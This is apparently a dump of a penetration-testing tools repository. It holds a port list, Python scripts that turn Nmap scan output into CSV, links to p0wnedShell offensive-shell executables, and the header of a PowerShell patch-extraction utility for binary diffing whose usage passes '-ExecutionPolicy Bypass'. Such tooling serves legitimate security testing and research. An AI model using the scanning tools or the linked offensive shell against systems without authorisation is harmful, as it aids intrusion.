601 | 5679 602 | 5718 603 | 5730 604 | 5800 605 | 5801 606 | 5802 607 | 5810 608 | 5811 609 | 5815 610 | 5822 611 | 5825 612 | 5850 613 | 5859 614 | 5862 615 | 5877 616 | 5900 617 | 5901 618 | 5902 619 | 5903 620 | 5904 621 | 5906 622 | 5907 623 | 5910 624 | 5911 625 | 5915 626 | 5922 627 | 5925 628 | 5950 629 | 5952 630 | 5959 631 | 5960 632 | 5961 633 | 5962 634 | 5963 635 | 5987 636 | 5988 637 | 5989 638 | 5998 639 | 5999 640 | 6000 641 | 6001 642 | 6002 643 | 6003 644 | 6004 645 | 6005 646 | 6006 647 | 6007 648 | 6009 649 | 6025 650 | 6059 651 | 6100 652 | 6101 653 | 6106 654 | 6112 655 | 6123 656 | 6129 657 | 6156 658 | 6346 659 | 6389 660 | 6502 661 | 6510 662 | 6543 663 | 6547 664 | 6565 665 | 6566 666 | 6567 667 | 6580 668 | 6646 669 | 6666 670 | 6667 671 | 6668 672 | 6669 673 | 6689 674 | 6692 675 | 6699 676 | 6779 677 | 6788 678 | 6789 679 | 6792 680 | 6839 681 | 6881 682 | 6901 683 | 6969 684 | 7000 685 | 7001 686 | 7002 687 | 7004 688 | 7007 689 | 7019 690 | 7025 691 | 7070 692 | 7100 693 | 7103 694 | 7106 695 | 7200 696 | 7201 697 | 7402 698 | 7435 699 | 7443 700 | 7496 701 | 7512 702 | 7625 703 | 7627 704 | 7676 705 | 7741 706 | 7777 707 | 7778 708 | 7800 709 | 7911 710 | 7920 711 | 7921 712 | 7937 713 | 7938 714 | 7999 715 | 8000 716 | 8001 717 | 8002 718 | 8007 719 | 8008 720 | 8009 721 | 8010 722 | 8011 723 | 8021 724 | 8022 725 | 8031 726 | 8042 727 | 8045 728 | 8080 729 | 8081 730 | 8082 731 | 8083 732 | 8084 733 | 8085 734 | 8086 735 | 8087 736 | 8088 737 | 8089 738 | 8090 739 | 8093 740 | 8099 741 | 8100 742 | 8180 743 | 8181 744 | 8192 745 | 8193 746 | 8194 747 | 8200 748 | 8222 749 | 8254 750 | 8290 751 | 8291 752 | 8292 753 | 8300 754 | 8333 755 | 8383 756 | 8400 757 | 8402 758 | 8443 759 | 8500 760 | 8600 761 | 8649 762 | 8651 763 | 8652 764 | 8654 765 | 8701 766 | 8800 767 | 8873 768 | 8888 769 | 8899 770 | 8994 771 | 9000 772 | 9001 773 | 9002 774 | 9003 775 | 9009 776 | 9010 777 | 9011 778 | 9040 779 | 9050 780 | 9071 781 | 9080 782 | 9081 783 | 9090 784 | 9091 785 | 9099 786 | 9100 787 | 9101 788 | 9102 789 | 9103 790 | 9110 791 | 9111 792 | 9200 793 | 9207 794 | 9220 795 | 9290 796 | 9415 797 | 9418 798 | 9485 799 | 9500 800 | 9502 801 | 9503 802 | 9535 803 | 9575 804 | 9593 805 | 9594 806 | 9595 807 | 9618 808 | 9666 809 | 9876 810 | 9877 811 | 9878 812 | 9898 813 | 9900 814 | 9917 815 | 9929 816 | 9943 817 | 9944 818 | 9968 819 | 9998 820 | 9999 821 | 10000 822 | 10001 823 | 10002 824 | 10003 825 | 10004 826 | 10009 827 | 10010 828 | 10012 829 | 10024 830 | 10025 831 | 10082 832 | 10180 833 | 10215 834 | 10243 835 | 10566 836 | 10616 837 | 10617 838 | 10621 839 | 10626 840 | 10628 841 | 10629 842 | 10778 843 | 11110 844 | 11111 845 | 11967 846 | 12000 847 | 12174 848 | 12265 849 | 12345 850 | 13456 851 | 13722 852 | 13782 853 | 13783 854 | 14000 855 | 14238 856 | 14441 857 | 14442 858 | 15000 859 | 15002 860 | 15003 861 | 15004 862 | 15660 863 | 15742 864 | 16000 865 | 16001 866 | 16012 867 | 16016 868 | 16018 869 | 16080 870 | 16113 871 | 16992 872 | 16993 873 | 17877 874 | 17988 875 | 18040 876 | 18101 877 | 18988 878 | 19101 879 | 19283 880 | 19315 881 | 19350 882 | 19780 883 | 19801 884 | 19842 885 | 20000 886 | 20005 887 | 20031 888 | 20221 889 | 20222 890 | 20828 891 | 21571 892 | 22939 893 | 23502 894 | 24444 895 | 24800 896 | 25734 897 | 25735 898 | 26214 899 | 27000 900 | 27352 901 | 27353 902 | 27355 903 | 27356 904 | 27715 905 | 28201 906 | 30000 907 | 30718 908 | 30951 909 | 31038 910 | 31337 911 | 32768 912 | 32769 913 | 32770 914 | 32771 915 | 32772 916 | 32773 917 | 32774 918 | 32775 919 | 32776 920 | 32777 921 | 32778 922 | 32779 923 | 32780 924 | 32781 925 | 32782 926 | 32783 927 | 32784 928 | 32785 929 | 33354 930 | 33899 931 | 34571 932 | 34572 933 | 34573 934 | 35500 935 | 38292 936 | 40193 937 | 40911 938 | 41511 939 | 42510 940 | 44176 941 | 44442 942 | 44443 943 | 44501 944 | 45100 945 | 48080 946 | 49152 947 | 49153 948 | 49154 949 | 49155 950 | 49156 951 | 49157 952 | 49158 953 | 49159 954 | 49160 955 | 49161 956 | 49163 957 | 49165 958 | 49167 959 | 49175 960 | 49176 961 | 49400 962 | 49999 963 | 50000 964 | 50001 965 | 50002 966 | 50003 967 | 50006 968 | 50300 969 | 50389 970 | 50500 971 | 50636 972 | 50800 973 | 51103 974 | 51493 975 | 52673 976 | 52822 977 | 52848 978 | 52869 979 | 54045 980 | 54328 981 | 55055 982 | 55056 983 | 55555 984 | 55600 985 | 56737 986 | 56738 987 | 57294 988 | 57797 989 | 58080 990 | 60020 991 | 60443 992 | 61532 993 | 61900 994 | 62078 995 | 63331 996 | 64623 997 | 64680 998 | 65000 999 | 65129 1000 | 65389 1001 | -------------------------------------------------------------------------------- /nmap-files/nmaptocsv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | # This file is part of nmaptocsv. 5 | # 6 | # Copyright (C) 2012, Thomas Debize 7 | # All rights reserved. 8 | # 9 | # nmaptocsv is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU Lesser General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # nmaptocsv is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU Lesser General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU Lesser General Public License 20 | # along with nmaptocsv. If not, see . 21 | 22 | # Global imports 23 | import sys, re, csv, struct, socket, itertools 24 | 25 | # OptionParser imports 26 | from optparse import OptionParser 27 | 28 | # Options definition 29 | option_0 = { 'name' : ('-i', '--input'), 'help' : 'Nmap scan output file (stdin if not specified)', 'nargs' : 1 } 30 | option_1 = { 'name' : ('-o', '--output'), 'help' : 'csv output filename (stdout if not specified)', 'nargs' : 1 } 31 | option_2 = { 'name' : ('-f', '--format'), 'help' : 'csv column format { fqdn, hop_number, ip, mac_address, mac_vendor, port, protocol, os, service, version } (default : ip-fqdn-port-protocol-service-version)', 'nargs' : 1 } 32 | option_3 = { 'name' : ('-n', '--newline'), 'help' : 'insert a newline between each host for better readability', 'action' : 'count' } 33 | option_4 = { 'name' : ('-s', '--skip-header'), 'help' : 'do not print the csv header', 'action' : 'count' } 34 | option_5 = { 'name' : ('-d', '--delimiter'), 'help' : 'Delimiter to use in CSV (semicolon if not specified)', 'nargs' : 1 } 35 | 36 | options = [option_0, option_1, option_2, option_3, option_4, option_5] 37 | 38 | # Format option 39 | DEFAULT_FORMAT = 'ip-fqdn-port-protocol-service-version' 40 | SUPPORTED_FORMAT_OBJECTS = [ 'fqdn', 'hop_number', 'ip', 'mac_address', 'mac_vendor', 'port', 'protocol', 'os', 'service', 'version' ] 41 | INVALID_FORMAT = 10 42 | VALID_FORMAT = 11 43 | 44 | # Newline option 45 | NO_NEWLINE = 20 46 | YES_NEWLINE = 21 47 | 48 | # Header option 49 | NO_HEADER = 22 50 | YES_HEADER = 23 51 | 52 | # Handful patterns 53 | #-- IP regex 54 | p_ip_elementary = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})' 55 | p_mac_elementary = '[0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F]' 56 | 57 | # Nmap Normal Output patterns 58 | #-- Target 59 | p_ip_nmap5 = 'Interesting.*on\s(?:(?P.*) (?=\((?P%s)\)))|Interesting.*on\s(?P.*)\:' % p_ip_elementary 60 | p_ip_nmap6 = 'Nmap.*for\s(?:(?P.*) (?=\((?P%s)\)))|Nmap.*for\s(?P%s)$' % (p_ip_elementary, p_ip_elementary) 61 | 62 | p_ip = re.compile('%s|%s' % (p_ip_nmap5, p_ip_nmap6)) 63 | 64 | #-- Port finding 65 | p_port = re.compile('^(?P[\d]+)\/(?Ptcp|udp)\s+(?:open|open\|filtered)\s+(?P[\w\S]*)(?:\s*(?P.*))?$') 66 | 67 | #-- MAC address 68 | p_mac = re.compile('MAC Address:\s(?P(%s))\s\((?P.*)\)' % p_mac_elementary) 69 | 70 | #-- OS detection (pattern order is important, the latter position the more precise and reliable the information is) 71 | p_os = re.compile('(?:^Service Info: OS|^OS|^OS details|smb-os-discovery|\|\s+OS):\s(?P[^;]+)') 72 | 73 | #-- Network distance 74 | p_network_dist = re.compile('Network Distance:\s(?P\d+)\shops?') 75 | 76 | # Nmap Grepable output 77 | #-- Target, Ports 78 | p_grepable = re.compile('(?P^Host:\s.*)') 79 | 80 | 81 | # Handful functions 82 | def dottedquad_to_num(ip): 83 | """ 84 | Convert decimal dotted quad string IP to long integer 85 | """ 86 | return struct.unpack('!L',socket.inet_aton(ip))[0] 87 | 88 | def num_to_dottedquad(n): 89 | """ 90 | Convert long int IP to dotted quad string 91 | """ 92 | return socket.inet_ntoa(struct.pack('!L',n)) 93 | 94 | def unique_match_from_list(list): 95 | """ 96 | Check the list for a potential pattern match 97 | 98 | @param list : a list of potential matching groups 99 | 100 | @rtype : return the unique value that matched, or nothing if nothing matched 101 | """ 102 | result = '' 103 | for item in list: 104 | if item != None: 105 | result = str(item) 106 | 107 | return result 108 | 109 | def extract_matching_pattern(regex, group_name, unfiltered_list): 110 | """ 111 | Return the desired group_name from a list of matching patterns 112 | 113 | @param regex : a regular expression with named groups 114 | @param group_name : the desired matching group name value 115 | @param unfiltered_list : a list of matches 116 | 117 | @rtype : the string value 118 | """ 119 | result = '' 120 | filtered_list = filter(regex.search, unfiltered_list) 121 | 122 | if len(filtered_list) == 1: 123 | filtered_string = ''.join(filtered_list) 124 | result = regex.search(filtered_string).group(group_name) 125 | 126 | return result 127 | 128 | class Host: 129 | def __init__(self, ip, fqdn=''): 130 | self.ip_dottedquad = ip 131 | self.ip_num = dottedquad_to_num(ip) 132 | self.fqdn = fqdn 133 | self.ports = [] 134 | self.os = '' 135 | self.mac_address = '' 136 | self.mac_address_vendor = '' 137 | self.network_distance = '' 138 | 139 | def add_port(self, port): 140 | self.ports.append(port) 141 | 142 | # Getters 143 | def get_ip_num_format(self): 144 | return str(self.ip_num) 145 | 146 | def get_ip_dotted_format(self): 147 | return str(self.ip_dottedquad) 148 | 149 | def get_fqdn(self): 150 | return str(self.fqdn) 151 | 152 | def get_port_list(self): 153 | return self.ports 154 | 155 | def get_port_number_list(self): 156 | if not(self.get_port_list()): 157 | return [''] 158 | else: 159 | result = [] 160 | for port in self.get_port_list(): 161 | result.append(port.get_number()) 162 | return result 163 | 164 | def get_port_protocol_list(self): 165 | if not(self.get_port_list()): 166 | return [''] 167 | else: 168 | result = [] 169 | for port in self.get_port_list(): 170 | result.append(port.get_protocol()) 171 | return result 172 | 173 | def get_port_service_list(self): 174 | if not(self.get_port_list()): 175 | return [''] 176 | else: 177 | result = [] 178 | for port in self.get_port_list(): 179 | result.append(port.get_service()) 180 | return result 181 | 182 | def get_port_version_list(self): 183 | if not(self.get_port_list()): 184 | return [''] 185 | else: 186 | result = [] 187 | for port in self.get_port_list(): 188 | result.append(port.get_version()) 189 | return result 190 | 191 | def get_os(self): 192 | return str(self.os) 193 | 194 | def get_mac_address(self): 195 | return str(self.mac_address) 196 | 197 | def get_mac_address_vendor(self): 198 | return str(self.mac_address_vendor) 199 | 200 | def get_network_distance(self): 201 | return str(self.network_distance) 202 | 203 | # Setters 204 | def set_fqdn(self, fqdn): 205 | self.fqdn = fqdn 206 | 207 | def set_os(self, os): 208 | self.os = os 209 | 210 | def set_mac(self, mac_address, mac_address_vendor = ''): 211 | self.mac_address = mac_address 212 | self.mac_address_vendor = mac_address_vendor 213 | 214 | def set_network_distance(self, network_distance): 215 | self.network_distance = network_distance 216 | 217 | class Port: 218 | def __init__(self, number, protocol, service, version): 219 | self.number = number 220 | self.protocol = protocol 221 | self.service = service 222 | self.version = version 223 | 224 | def get_number(self): 225 | return self.number 226 | 227 | def get_protocol(self): 228 | return self.protocol 229 | 230 | def get_service(self): 231 | return self.service 232 | 233 | def get_version(self): 234 | return self.version 235 | 236 | def split_grepable_match(raw_string) : 237 | """ 238 | Split the raw line to a neat Host object 239 | 240 | @param raw_string : the whole 'Host' line 241 | 242 | @rtype : return an Host object 243 | """ 244 | global p_ip_elementary 245 | 246 | splitted_fields = raw_string.split("\t") 247 | 248 | # Patterns 249 | p_host = re.compile('Host:\s(?P%s)\s+\((?P|.*)\)' % p_ip_elementary) 250 | p_ports = re.compile('Ports:\s+(?P.*)') 251 | p_os = re.compile('OS:\s(?P.*)') 252 | 253 | # Extracted named-group matches 254 | IP_str = extract_matching_pattern(p_host, 'ip', splitted_fields) 255 | FQDN_str = extract_matching_pattern(p_host, 'fqdn', splitted_fields) 256 | ports_str = extract_matching_pattern(p_ports, 'ports', splitted_fields) 257 | OS_str = extract_matching_pattern(p_os, 'os', splitted_fields) 258 | 259 | current_host = Host(IP_str, FQDN_str) 260 | current_host.set_os(OS_str) 261 | 262 | # Let's split the raw port list 263 | all_ports = ports_str.split(', ') 264 | 265 | # Keep only open ports 266 | open_ports_list = filter(lambda p: '/open/' in p, all_ports) 267 | 268 | for open_port in open_ports_list : 269 | splitted_fields = open_port.split('/',6) 270 | 271 | # Extract each field from the format [port number / state / protocol / owner / service / rpc info / version info] 272 | #-- Thanks to http://www.unspecific.com/nmap-oG-output/ 273 | number, state, protocol, owner, service, version = splitted_fields[0:6] 274 | 275 | new_port = Port(number, protocol, service, version) 276 | 277 | current_host.add_port(new_port) 278 | 279 | 280 | return current_host 281 | 282 | def parse(fd) : 283 | """ 284 | Parse the data according to several regexes 285 | 286 | @param fd : input file descriptor, could be a true file or stdin 287 | 288 | @rtype : return a list of objects indexed from their numerical IP representation 289 | """ 290 | global p_ip_elementary, p_ip, p_port, p_grepable 291 | 292 | IPs = {} 293 | last_host = None 294 | 295 | lines = [l.rstrip() for l in fd.readlines()] 296 | for line in lines: 297 | # 1st case: Nmap Normal Output 298 | #-- 1st action: Grab the IP 299 | IP = p_ip.search(line) 300 | if IP: 301 | # Check out what patterns matched 302 | IP_potential_match = [IP.group('ip_nmap5'), IP.group('ip_only_nmap5'), IP.group('ip_nmap6'), IP.group('ip_only_nmap6')] 303 | IP_str = unique_match_from_list(IP_potential_match) 304 | 305 | FQDN_potential_match = [IP.group('fqdn_nmap5'), IP.group('fqdn_nmap6')] 306 | FQDN_str = unique_match_from_list(FQDN_potential_match) 307 | 308 | new_host = Host(IP_str, FQDN_str) 309 | 310 | IPs[new_host.get_ip_num_format()] = new_host 311 | 312 | last_host = new_host 313 | 314 | 315 | # 1st case: Nmap Normal Output 316 | #-- 2nd action: Grab the port 317 | port = p_port.search(line) 318 | if port and last_host != None: 319 | number = str(port.group('number')) 320 | protocol = str(port.group('protocol')) 321 | service = str(port.group('service')) 322 | version = str(port.group('version')) 323 | version = re.sub(r'syn-ack ttl \d+ ', "", version) 324 | version = re.sub(r'syn-ack ttl \d+', "", version) 325 | version = re.sub(r'udp-response ttl \d+ ', "", version) 326 | version = re.sub(r'udp-response ttl \d+', "", version) 327 | if (len(version)==0): 328 | version = " " 329 | new_port = Port(number, protocol, service, version ) 330 | 331 | last_host.add_port(new_port) 332 | 333 | 334 | # 1st case: Nmap Normal Output 335 | #-- 3rd action: Grab the MAC address 336 | mac = p_mac.search(line) 337 | if mac: 338 | last_host.set_mac(str(mac.group('mac_addr')), str(mac.group('mac_vendor'))) 339 | 340 | 341 | # 1st case: Nmap Normal Output 342 | #-- 4th action: Grab the OS detection 343 | os = p_os.search(line) 344 | if os: 345 | last_host.set_os(str(os.group('os'))) 346 | 347 | 348 | # 1st case: Nmap Normal Output 349 | #-- 5th action: Grab the network distance 350 | network_distance = p_network_dist.search(line) 351 | if network_distance: 352 | last_host.set_network_distance(str(network_distance.group('hop_number'))) 353 | 354 | 355 | # 2nd case: Nmap Grepable Output 356 | #-- 1 sole action: Grab the whole line for further splitting 357 | grepable = p_grepable.search(line) 358 | if grepable : 359 | if grepable.group('whole_line') : 360 | new_host = split_grepable_match(grepable.group('whole_line')) 361 | 362 | # Update the occurence found with 'Status: Up' 363 | IPs[new_host.get_ip_num_format()] = new_host 364 | 365 | last_host = new_host 366 | 367 | return IPs 368 | 369 | def check_supplied_format(fmt): 370 | """ 371 | Check for the supplied custom output format 372 | 373 | @param fmt : the supplied format 374 | 375 | @rtype : VALID_FORMAT or INVALID_FORMAT 376 | """ 377 | global SUPPORTED_FORMAT_OBJECTS, INVALID_FORMAT, VALID_FORMAT 378 | result = INVALID_FORMAT 379 | 380 | splitted_fmt = fmt.split('-') 381 | 382 | for fmt_object in splitted_fmt : 383 | if not(fmt_object in SUPPORTED_FORMAT_OBJECTS): 384 | break 385 | else : 386 | result = VALID_FORMAT 387 | 388 | return result 389 | 390 | def formatted_item(host, format_item): 391 | """ 392 | return the attribute value related to the host 393 | 394 | @param host : host object 395 | @param format_item : the attribute supplied in the custom format 396 | 397 | @rtype : the attribute value 398 | """ 399 | if isinstance(host, Host) : 400 | option_map = { 401 | 'fqdn' : [host.get_fqdn()], 402 | 'hop_number': [host.get_network_distance()], 403 | 'ip' : [host.get_ip_dotted_format()], 404 | 'mac_address': [host.get_mac_address()], 405 | 'mac_vendor': [host.get_mac_address_vendor()], 406 | 'os' : [host.get_os()], 407 | 'port': host.get_port_number_list(), 408 | 'protocol': host.get_port_protocol_list(), 409 | 'service': host.get_port_service_list(), 410 | 'version': host.get_port_version_list() 411 | } 412 | 413 | if format_item in option_map.keys(): 414 | return option_map[format_item] 415 | else : 416 | return '' 417 | else : 418 | return [] 419 | 420 | def repeat_attributes(attribute_list): 421 | """ 422 | repeat attribute lists to the maximum for the 423 | 424 | @param attribute_list : raw list with different attribute list length 425 | 426 | @rtype : a list consisting of length equal attribute list 427 | """ 428 | max_number = len(max(attribute_list, key=len)) 429 | attribute_list = map(lambda x: x * max_number, attribute_list) 430 | 431 | return attribute_list 432 | 433 | def generate_csv(fd, results, output_format, header, newline, user_delimiter) : 434 | """ 435 | Generate a plain ';' separated csv file with the desired or default attribute format 436 | 437 | @param fd : output file descriptor, could be a true file or stdout 438 | """ 439 | if results != {} : 440 | spamwriter = csv.writer(fd, delimiter=user_delimiter) 441 | 442 | if header == YES_HEADER: 443 | csv_header = [format_item.upper() for format_item in output_format.split('-')] 444 | spamwriter.writerow(csv_header) 445 | 446 | for IP in sorted(results.iterkeys()) : 447 | formatted_attribute_list = [] 448 | 449 | for index,format_item in enumerate(output_format.split('-')) : 450 | item = formatted_item(results[IP], format_item) 451 | formatted_attribute_list.insert(index, item) 452 | 453 | formatted_attribute_list = repeat_attributes(formatted_attribute_list) 454 | 455 | for line_to_write in itertools.izip(*formatted_attribute_list): 456 | spamwriter.writerow(list(line_to_write)) 457 | 458 | # Print a newline if asked 459 | if newline == YES_NEWLINE: 460 | spamwriter.writerow('') 461 | 462 | return 463 | 464 | def main(options, arguments): 465 | 466 | # Supplied format 467 | output_format = DEFAULT_FORMAT 468 | if options.format != None : 469 | if check_supplied_format(options.format) == VALID_FORMAT : 470 | output_format = options.format 471 | else: 472 | parser.error("Please specify a valid output format.\n\ 473 | Supported objects are { fqdn, ip, mac_address, mac_vendor, port, protocol, os, service, version }.") 474 | 475 | # Input descriptor 476 | if (options.input != None) : 477 | fd_input = open(options.input, 'rb') 478 | else : 479 | # No input file specified, reading from stdin 480 | fd_input = sys.stdin 481 | 482 | # Analysis 483 | results = parse(fd_input) 484 | fd_input.close() 485 | 486 | # Output descriptor 487 | if (options.output != None) : 488 | fd_output = open(options.output, 'wb') 489 | else : 490 | # No output file specified, writing to stdout 491 | fd_output = sys.stdout 492 | 493 | # Newline 494 | newline = {True : YES_NEWLINE, False : NO_NEWLINE}[options.newline != None] 495 | 496 | # Header 497 | header = {True : NO_HEADER, False : YES_HEADER}[options.skip_header != None] 498 | 499 | # CSV output 500 | if (options.delimiter != None) : 501 | generate_csv(fd_output, results, output_format, header, newline, options.delimiter) 502 | else : 503 | generate_csv(fd_output, results, output_format, header, newline, ';') 504 | fd_output.close() 505 | 506 | return 507 | 508 | if __name__ == "__main__" : 509 | parser = OptionParser() 510 | for option in options : 511 | param = option['name'] 512 | del option['name'] 513 | parser.add_option(*param, **option) 514 | 515 | options, arguments = parser.parse_args() 516 | main(options, arguments) 517 | -------------------------------------------------------------------------------- /nmap-xml-parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Source: https://github.com/interference-security/scripts-tools-shells/blob/master/nmap-ip-port-service-info.py 4 | #Author: Interference Security 5 | 6 | #Usage: nmap-ip-port-service-info.py [-h] -f INPUTFILE [-o OUTFILE] 7 | #Example: nmap-ip-port-service-info.py -f input_nmap.xml -o output_file.csv 8 | 9 | try: 10 | import sys 11 | import argparse 12 | from datetime import datetime 13 | from libnmap.parser import NmapParser 14 | except: 15 | print "Error: Missing python packages\n" 16 | print "Please ensure you have the following python packages installed:\n argparse, python-libnmap\n" 17 | print "How to install:\npip install \neasy_install \n" 18 | sys.exit(0) 19 | 20 | #Description of script 21 | parser = argparse.ArgumentParser(description="Nmap XML parser and generate CSV ouput") 22 | 23 | #Script command line options 24 | parser.add_argument('-i', '--inputfile', help='Input Nmap XML file', required=True) 25 | parser.add_argument('-o','--outfile', help='Save output in CSV file') 26 | #parser.add_argument('-O','--open', help='Show only open ports') 27 | 28 | args = parser.parse_args() 29 | 30 | targets = [] 31 | 32 | #Disable requests module HTTPS certificate untrusted warning message 33 | try: 34 | requests.packages.urllib3.disable_warnings() 35 | except: 36 | pass 37 | 38 | def parse_nmap_xml(nmap_xml_file, output_file): 39 | oufile = "" 40 | f = None 41 | if len(output_file)>0: 42 | f = open (output_file, "w") 43 | nmap_parse = NmapParser.parse_fromfile(nmap_xml_file) 44 | for host in nmap_parse.hosts: 45 | #print host.address+":" 46 | for service in host.services: 47 | targets.append(host.address+","+str(service.port)+","+str(service.state)+","+service.service+","+service.banner) 48 | #print service.servicefp 49 | #print dir(service) 50 | data = "IP,Port,State,Service Name,Service Info" 51 | print data 52 | if f != None: 53 | f.write(data+"\n") 54 | for target in targets: 55 | print target 56 | if f != None: 57 | f.write(target+"\n") 58 | return targets 59 | 60 | #Main function 61 | output_file = "" 62 | input_file = args.inputfile.encode('utf-8') 63 | if args.outfile: 64 | output_file = args.outfile 65 | targets = parse_nmap_xml(input_file, output_file) 66 | -------------------------------------------------------------------------------- /p0wnedshell/README.md: -------------------------------------------------------------------------------- 1 | #p0wnedshell Binary 2 | 3 | -------------------------------------------------------------------------------- /p0wnedshell/Smallp0wnedShell-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/Smallp0wnedShell-x64.exe -------------------------------------------------------------------------------- /p0wnedshell/Smallp0wnedShell-x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/Smallp0wnedShell-x86.exe -------------------------------------------------------------------------------- /p0wnedshell/p0wnedShell-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/p0wnedShell-x64.exe -------------------------------------------------------------------------------- /p0wnedshell/p0wnedShell-x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/p0wnedshell/p0wnedShell-x86.exe -------------------------------------------------------------------------------- /patchextract.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | 3 | Source: http://pastebin.com/raw/VjwNV23n 4 | ____ ______ ______ ____ __ __ 5 | /\ _`\ /\ _ \ /\__ _\/\ _`\ /\ \/\ \ 6 | \ \ \L\ \\ \ \L\ \\/_/\ \/\ \ \/\_\\ \ \_\ \ 7 | \ \ ,__/ \ \ __ \ \ \ \ \ \ \/_/_\ \ _ \ 8 | \ \ \/ \ \ \/\ \ \ \ \ \ \ \L\ \\ \ \ \ \ 9 | \ \_\ \ \_\ \_\ \ \_\ \ \____/ \ \_\ \_\ 10 | \/_/ \/_/\/_/ \/_/ \/___/ \/_/\/_/ 11 | 12 | 13 | ____ __ __ ______ ____ ______ ____ ______ 14 | /\ _`\ /\ \ /\ \ /\__ _\/\ _`\ /\ _ \ /\ _`\ /\__ _\ 15 | \ \ \L\_\\ `\`\/'/'\/_/\ \/\ \ \L\ \\ \ \L\ \\ \ \/\_\\/_/\ \/ 16 | \ \ _\L `\/ > < \ \ \ \ \ , / \ \ __ \\ \ \/_/_ \ \ \ 17 | \ \ \L\ \ \/'/\`\ \ \ \ \ \ \\ \ \ \ \/\ \\ \ \L\ \ \ \ \ 18 | \ \____/ /\_\\ \_\ \ \_\ \ \_\ \_\\ \_\ \_\\ \____/ \ \_\ 19 | \/___/ \/_/ \/_/ \/_/ \/_/\/ / \/_/\/_/ \/___/ \/_/ 20 | 21 | 22 | __ __ _ __ 23 | /\ \/\ \ /' \ /'__`\ 24 | \ \ \ \ \ /\_, \ /\_\L\ \ 25 | \ \ \ \ \\/_/\ \ \/_/_\_<_ 26 | \ \ \_/ \ \ \ \ __ /\ \L\ \ 27 | \ `\___/ \ \_\/\_\\ \____/ 28 | `\/__/ \/_/\/_/ \/___/ 29 | 30 | 31 | ================ 32 | PATCHEXTRACT.PS1 33 | ================= 34 | Version 1.3 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis) 35 | 36 | This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders. 37 | 38 | Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64) 39 | as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will 40 | goto a PATCH folder. 41 | 42 | This script was developed in order to aid reverse engineers in quickly organizing patches so they can be binary diffed faster and easier. 43 | This was especially developed with the new bulk Microsoft Kernel patches in mind. 44 | 45 | Example output folder structure ouput would be similar to this: 46 | 47 | C:\PATCHES\MS15-XXX\PRE 48 | -x86 49 | - x86 Binary patched files 50 | -x64 51 | - x64 binary patched files 52 | -WOW64 53 | - syswow64 binary patched files 54 | -JUNK 55 | - resource, catalog, mum, and other non-binary based patched files 56 | -PATCH 57 | - original patch, cabs and xml files from the extraction 58 | -MSIL 59 | - MSIL .NET binary patched files ***New in Version 1.1*** 60 | 61 | Directories will automagically be organized into filename-version to remove garbage filler folder names 62 | 63 | 64 | ============= 65 | REQUIREMENTS 66 | ============= 67 | 'expand.exe' to be present in %WINDIR%\SYSTEM32 (it is by default) - It will execute this file @ the current users permissions 68 | A valid Microsoft MSU patch file to extract (PATCH variable) 69 | Directory and File write/creation permissions to the PATH folder specified 70 | 71 | 72 | ======= 73 | USAGE 74 | ======= 75 | 76 | Powershell -ExecutionPolicy Bypass -File PatchExtract.ps1 -Patch C:\Patches\Windows6.1-KB3088195-x64.msu -Path C:\Patches\MS15-XXX\POST\ 77 | 78 | 79 | This would extract the patch file C:\Patches\Windows6.1-KB3088195-x64.msu to the folder C:\Patches\MS15-XXX\POST\. 80 | It will then create all the sub organization folders within C:\Patches\MS15-XXX\POST\ folder. 81 | 82 | (Note: the optional Powershell parameters '-ExecutionPolicy Bypass' is necessary in some environments to overcome Powershell execution restrictions) 83 | 84 | ========== 85 | ARGUMENTS 86 | ========== 87 | -PATCH [REQUIRED] [NO DEFAULT] 88 | Specifies the MSU file that will be extracted to the specified PATH folder and then organized into the x86, x64, WOW, JUNK, and BIN folders specified 89 | Extract command will be "expand -F:* " 90 | Non MSU files have not been tested however if the extraction does not generate a CAB file of the same name (indicator of successful extraction of MSU files) 91 | the script assumes extraction failed. 92 | 93 | -PATH [REQUIRED] [NO DEFAULT] 94 | Specified the folder that the PATCH file will be extracted and organized into 95 | If the specified folders does not exist yet, the user will be prompted if they want to create it. 96 | Relative paths '.\POST' can be used but it has not extensively been tested. 97 | 98 | ***New in Version 1.1*** 99 | The -PATH variable may be now omitted to expand to current directory 100 | 101 | 102 | -x86 [OPTIONAL] [DEFAULT='x86'] 103 | 104 | Specifies the folder name within $PATH to store x86 patch binaries 105 | example: -x86 32bit 106 | 107 | 108 | -x64 [OPTIONAL] [DEFAULT='x64'] 109 | 110 | Specifies the folder name within $PATH to store x64 patch binaries 111 | example: -x64 64bit 112 | 113 | -WOW [OPTIONAL] [DEFAULT='WOW64'] 114 | 115 | Specifies the folder name within $PATH to store wow64 type patch binaries 116 | example: -WOW sysWOW64 117 | 118 | -MSIL [OPTIONAL] [DEFAULT='MSIL'] 119 | 120 | *** New in Version 1.1*** 121 | Specifies the folder name within $PATH to store .NET type patch binaries 122 | example: -MSIL DOTNET 123 | 124 | -JUNK [OPTIONAL] 